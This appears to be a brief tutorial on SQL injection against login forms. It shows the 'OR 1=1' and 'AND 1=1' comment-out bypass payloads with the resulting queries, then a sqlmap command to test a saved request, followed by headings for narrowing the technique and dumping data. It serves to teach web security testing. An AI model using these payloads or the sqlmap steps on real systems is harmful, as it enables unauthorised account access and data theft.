SQL Injection

This happens because developers use unsafe queries like the following to log someone in:

select username from users where username = '[user input]' and password = '[user input]'

We can exploit this by breaking their single quotes but submitting something in the username like:

admin' OR 1=1;-- -

This turns their unsafe query into the following:

select username from users where username = 'admin' OR 1=1;-- - and password = 'whatever'

This means: Select the username from users where the username is admin or 1=1 (in other words, true), and then comments out the rest of the statement. This will log us in to the first user that is returned

If we know a username and we want to log in as them, we can use a similar attack with the AND keyword:

admin' AND 1=1;-- -

Thus making the query:

select username from users where username = 'admin' AND 1=1;-- - and password = 'whatever'

This means: Select the username from users where the username is admin AND 1=1 (in other words, true), and then comments out the rest of the statement. This will log us in to the first user with the username of admin

Sqlmap

Sqlmap can do a lot of the heavy lifting for us, and can also test for sqli in applications. The simplest way is to grab a copy of the request to log in from BurpSuite or Caido, or something similar and save it to a file. For this example, that will be login.req

Testing for SQLi

sqlmap -r login.req --batch

Finding the Technique

There are various types of sql injection techniques - we've discovered a boolean-based blind injection, so we can specify a technique to search for it specifically :

Finding Boolean

Adding the technique will make this a bit faster as well as adding the level of aggressiveness. With a boolean injection, more aggressive is fine

Dumping data

Now that we've confirmed there's a boolean based blind injection, we can start dumping some data